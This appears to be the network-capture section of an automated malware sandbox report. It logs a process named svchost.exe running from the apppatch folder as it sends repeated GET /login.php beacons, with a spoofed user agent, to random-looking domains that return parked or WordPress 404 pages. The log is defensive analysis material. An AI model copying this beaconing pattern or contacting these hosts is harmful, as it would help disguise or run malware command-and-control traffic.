Aug 23, 2024 18:44:07.048265934 CEST	1236	IN	Data Raw: 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72 61 Data Ascii: -moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-hei
Aug 23, 2024 18:44:07.048276901 CEST	1236	IN	Data Raw: 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 66 64 38 30 31 Data Ascii: e}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-
Aug 23, 2024 18:44:07.052856922 CEST	1236	IN	Data Raw: 69 64 36 78 38 75 53 6f 2f 65 7a 53 6a 52 2f 43 52 5a 4f 53 4d 33 41 67 3d 3d 22 2c 22 74 69 64 22 3a 22 33 30 39 37 22 2c 22 62 75 79 62 6f 78 22 3a 74 72 75 65 2c 22 62 75 79 62 6f 78 54 6f 70 69 63 22 3a 74 72 75 65 2c 22 64 69 73 63 6c 61 69 Data Ascii: id6x8uSo/ezSjR/CRZOSM3Ag==","tid":"3097","buybox":true,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":false,"slsh":false,"ppsh":true,"dnhlsh":true,"toSellUrl":"https://sedo.com/search/details/?partnerid=14460&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	61324	199.59.243.226	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:44:06.507288933 CEST	356	OUT	GET /login.php?subid1=20240824-0244-06be-9bcf-3aaf77f61bcb HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1724431387.5010053 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:44:06.962519884 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 23 Aug 2024 16:44:06 GMT content-type: text/html; charset=utf-8 content-length: 1226 x-request-id: ad1c2771-2297-4319-96a1-9e173e7d7ea3 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_I+XghzwkUhekaUfxzTYsL/Nygdqm5Gs1Of+YIVLgyQcAcQ1JhANWny26aVdFM480fm4+Byg8l/kb0fCWv9n3VQ== set-cookie: parking_session=ad1c2771-2297-4319-96a1-9e173e7d7ea3; expires=Fri, 23 Aug 2024 16:59:06 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 49 2b 58 67 68 7a 77 6b 55 68 65 6b 61 55 66 78 7a 54 59 73 4c 2f 4e 79 67 64 71 6d 35 47 73 31 4f 66 2b 59 49 56 4c 67 79 51 63 41 63 51 31 4a 68 41 4e 57 6e 79 32 36 61 56 64 46 4d 34 38 30 66 6d 34 2b 42 79 67 38 6c 2f 6b 62 30 66 43 57 76 39 6e 33 56 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_I+XghzwkUhekaUfxzTYsL/Nygdqm5Gs1Of+YIVLgyQcAcQ1JhANWny26aVdFM480fm4+Byg8l/kb0fCWv9n3VQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Aug 23, 2024 18:44:06.962538004 CEST	867	IN	Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWQxYzI3NzEtMjI5Ny00MzE5LTk2YTEtOWUxNzNlN2Q3ZWEzIiwicGFnZV90aW1lIjoxNzI0NDMxNDQ2LCJwYWdlX3VybCI6I

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49721	188.114.96.3	443	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-23 16:42:14 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Connection: Keep-Alive
2024-08-23 16:42:14 UTC	6	OUT	Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
2024-08-23 16:42:16 UTC	763	IN	HTTP/1.1 404 Not Found Date: Fri, 23 Aug 2024 16:42:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBj5aZVI65kyZDJ%2FFidXbhtn%2B962u%2BE4mvm4If5SGmgioNP3sS2S7XBhsBaCfCOsppletHJ1sKxNw8sEVkSsmqJo3Qhg4UA%2F%2FHLNAmXINOGvKtg4SyrVksPbHLtgUA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c8e02b871c34b-EWR alt-svc: h3=":443"; ma=86400
2024-08-23 16:42:16 UTC	606	IN	Data Raw: 37 63 62 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e Data Ascii: 7cb6<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
2024-08-23 16:42:16 UTC	1369	IN	Data Raw: 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f Data Ascii: -</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://
2024-08-23 16:42:16 UTC	1369	IN	Data Raw: 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 Data Ascii: ,e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every
2024-08-23 16:42:16 UTC	1369	IN	Data Raw: 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 63 68 28 65 Data Ascii: nce:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e
2024-08-23 16:42:16 UTC	1369	IN	Data Raw: 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 33 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 Data Ascii: ef='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.3.1' media='all' /><style id='astra-theme-css-inline-css'>:root{--ast-container-default-xlg-padding:3em;--ast-container-default-lg-padding:3em;--ast-container-default
2024-08-23 16:42:16 UTC	1369	IN	Data Raw: 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 Data Ascii: ight:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:600;line-height:1.25em;}h3,.entry-content h3{font-size:26px;font-size:1.625rem;font-weight:600;line-height:1.2em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;line-height:1
2024-08-23 16:42:16 UTC	1369	IN	Data Raw: 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b 2c 2e 70 61 Data Ascii: d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{color:#d10404;}.entry-meta,.entry-meta {line-height:1.45;color:#d10404;}.entry-meta a:hover,.entry-meta a:hover ,.entry-meta a:focus,.entry-meta a:focus *,.page-links > .page-link,.pa
2024-08-23 16:42:16 UTC	1369	IN	Data Raw: 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 6f 63 5f 5f 77 72 61 70 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 61 78 6f 6d 6f 6e 79 2d 62 6f 78 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 20 3e 20 6c 69 20 3e 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f Data Ascii: single-post .entry-content .uagb-timeline a,.ast-single-post .entry-content .uagb-toc__wrap a,.ast-single-post .entry-content .uagb-taxomony-box a,.ast-single-post .entry-content .woocommerce a,.entry-content .wp-block-latest-posts > li > a,.ast-single-po
2024-08-23 16:42:16 UTC	1369	IN	Data Raw: 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d 74 72 69 67 67 65 Data Ascii: ]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,input[type="number"]:focus,textarea:focus,.wp-block-search__input:focus,[data-section="section-header-mobile-trigge

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49723	188.114.96.3	443	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-23 16:42:17 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Connection: Keep-Alive
2024-08-23 16:42:17 UTC	6	OUT	Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
2024-08-23 16:42:20 UTC	761	IN	HTTP/1.1 404 Not Found Date: Fri, 23 Aug 2024 16:42:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7JRfeBUh1WIiC1qA5SYFt9n%2BNc867fRUr5wP1ixM6lidfKI3uUWb9WzlaPXKVwcvqHinp3o3gY%2BAjsp0kLy%2F6M7W0fIO8FrWQTbeVwCYpSx7eqGYyBg%2FBbq5xiu1fg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c8e16b95242f8-EWR alt-svc: h3=":443"; ma=86400
2024-08-23 16:42:20 UTC	608	IN	Data Raw: 37 63 62 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e Data Ascii: 7cb8<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
2024-08-23 16:42:20 UTC	1369	IN	Data Raw: 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 71 65 Data Ascii: </title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://qe
2024-08-23 16:42:20 UTC	1369	IN	Data Raw: 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 28 66 Data Ascii: .fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(f
2024-08-23 16:42:20 UTC	1369	IN	Data Raw: 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 63 68 28 65 29 7b Data Ascii: e:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){
